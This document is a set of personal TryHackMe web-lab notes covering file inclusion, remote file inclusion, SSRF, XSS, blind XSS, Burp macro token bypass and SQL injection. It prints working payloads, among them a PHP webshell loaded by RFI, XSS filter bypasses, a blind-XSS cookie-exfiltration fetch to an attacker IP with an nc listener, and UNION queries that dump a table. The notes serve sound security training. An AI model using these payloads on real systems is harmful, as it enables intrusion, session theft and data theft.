# web vulnerable [TOC] ###### tags: `tryhackme` `web` # File Inclusion ![](https://i.imgur.com/VBoA7yl.png) Tempering cookie ->admin ``` curl 'http://10.10.188.128/challenges/chall2.php?file=/etc/flag2' -H 'Cookie: THM=admins' ``` ![](https://i.imgur.com/g4e8Ba9.png) It's specify the directory, here i try to use path traversal technology to by pass it ![](https://i.imgur.com/ZKVwoTD.png) Cookie: THM=../../../../etc/flag2%00 ![](https://i.imgur.com/0D2Da8w.png) ## Capture Flag3 at /etc/flag3 get request -> slash will be delete by the script. ->post request ![](https://i.imgur.com/8WC9Vt9.png) --- Gain RCE in **Lab #Playground** /playground.php with RFI to execute the hostname command. What is the output? ## python3 -m http.server ``` <?php echo exec('hostname');?> ``` ![](https://i.imgur.com/VHWuGEE.png) ![](https://i.imgur.com/QDaGzEC.png) ![](https://i.imgur.com/ktyTjpw.png) ``` <?php print exec($_REQUEST["cmd"]); ?> ``` ``` http://10.10.82.106/playground.php?file=http://10.10.23.100:8000/webshell.php&&cmd=etc /proc/version ``` # SSRF ## What is the flag from the /private directory? ## InFo 1 **/private**, which gives us an error message explaining that the contents cannot be viewed from our IP address. 2 **/customers/new-account-page** with a new feature allowing customers to choose an avatar for their account. step 1 create a account to login and view [https://10-10-135-212.p.thmlabs.com/customers/new-account-page](https://10-10-135-212.p.thmlabs.com/customers/new-account-page) Ctrl+shift+c ![](https://i.imgur.com/TzRDMrr.png) ![](https://i.imgur.com/Q2tzA3z.png) Choose one of the avatars and then click the **Update Avatar** button ![](https://i.imgur.com/V0ZR5UO.png) Try to use the SSRF vulnerability to request /private page ![](https://i.imgur.com/nA2LJBT.png) Result ![](https://i.imgur.com/lJaiMfF.png) Here, probably having a rule prevent our request forgery. ## By Pass We use the path traversal trick value='meowhecker/../private' ![](https://i.imgur.com/yNs1yit.png) [https://www.asciitohex.com/](https://www.asciitohex.com/) THM{YOU_WORKED_OUT_THE_SSRF} # Xss payload Level 1 ## Proof ``` <script>alert(document.cookie)</script> ``` ## Level 2 ``` "><svg onload=alert("doucment.cookie")<!-- ``` ## Level 3 ``` </textarea><svg onlaod=alert("doucment.cookie")> ``` ## Level 4 ``` ';alert('doucment.cookie')// ``` ![](https://i.imgur.com/XzFGD8t.png) ## Level 5 ### Methods 1 ``` <svg onload=alert('doucment.cookie')> ``` ![](https://i.imgur.com/2nrrs06.png) ### Methods 2 ``` <sscriptcript>alert('doucment.cookie')</sscriptcript> ``` Level 6 ``` meow" onerror="alert('THM') ``` **THM{XSS_MASTER}** ## By Pass ``` jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert('THM')//>\\x3e ``` 他們可能會使用各種工具來生成這段代碼 `javascript:`是一種用於在網頁中嵌入JavaScript代碼的方法 --- # Xss Blind ###### tags: `meowhecker` `xss` `blind` `tryhackme` Click on the **Customers** tab on the top navigation bar and click the "**Signup here**" link to create an account. Once your account gets set up, click the **Support Tickets** tab, which is the feature we will investigate for weaknesses. ![](https://i.imgur.com/4xMy6ug.png) ``` meow</textarea><svg onload=alert(document.cookie)> ``` Hacker Server ``` nc -nlvp 6699 ``` -n Don't do dns resolve -l listen -v verbose -p specify port Attack payload ``` </textarea><svg onload=fetch('http://10.10.164.43:6699?cookie='+btoa(document.cookie))></svg><!-- ``` # Burp suite ## CSRF token bypass ###### tags: `meowhecker` `burp suite` `token bypass` 需要再練習 ## Target http://10.10.56.212/admin/login/ ![](https://i.imgur.com/ogmBXiM.png) ### Response ![](https://i.imgur.com/sFTppbb.png) ![](https://i.imgur.com/sa1hDTz.png) --- Intruder username ->wordlist password ->wordlist loginToken->macro session->macro ## Login token(key and without the account and password) ![](https://i.imgur.com/L7HjOD2.png) ![](https://i.imgur.com/zkLlaQM.png) ## Build a macro. Macros是在資訊安全領域中一種指令的集合。通常用於應用程式或電腦系統中,用來自動化重複的任務或操作。在資訊安全領域中,Macros通常用來檢查系統是否安全,或者自動化防禦攻擊。 Macros allow us to perform the same set of actions repeatedly. In this case, we simply want to send a GET request to `/admin/login/`. "Project Options" -> "Sessions" ![](https://i.imgur.com/x5VupXH.png) --- ![](https://i.imgur.com/6ypWsMb.png) --- ![](https://i.imgur.com/nDf74yB.png) --- ![](https://i.imgur.com/TgId1Ec.png) --- ![](https://i.imgur.com/QXDQAoY.png) --- ![](https://i.imgur.com/9OWJqs2.png) macro will now overwrite all of the parameters in our Intruder requests before we send --- ![](https://i.imgur.com/cLbPA4x.png) Now we have a macro defined that will substitute in the CSRF token and session cookie. ![](https://i.imgur.com/vK3ziY3.png) ![](https://i.imgur.com/TXOybQs.png) # SQLi with Repeater ###### tags: `tryhackme` `web` ## Proof ``` http://10.10.238.248/about/1' ``` ![](https://i.imgur.com/deK4Yx1.png) ## Proxy -> Repeater ctrl + R ctrl + shift + R ``` 1 or 1=1 ``` ![](https://i.imgur.com/tByL2aq.png) ## Built a payload ``` 1 union select null,null,null,null,null ``` ### Find the column Name ``` GET /about/-1 union select "meowhecker",column_name,null,null,null from information_schema.columns where table_name="people" ``` ![](https://i.imgur.com/TiPJVz5.png) --- ### Enumerate all column ``` GET /about/-1 union select "meowhecker",group_concat(column_name),null,null,null from information_schema.columns where table_name="people" ``` ![](https://i.imgur.com/ZmlkYqw.png) column ``` id,firstName,lastName,pfpLink,role,shortRole,bio,notes ``` Retrieve Data ``` GET /about/-1 union select null,null,null,null,concat(id,firstName,lastName,pfpLink,role,shortRole,bio,notes) from people ``` ![](https://i.imgur.com/TRMvqvM.png)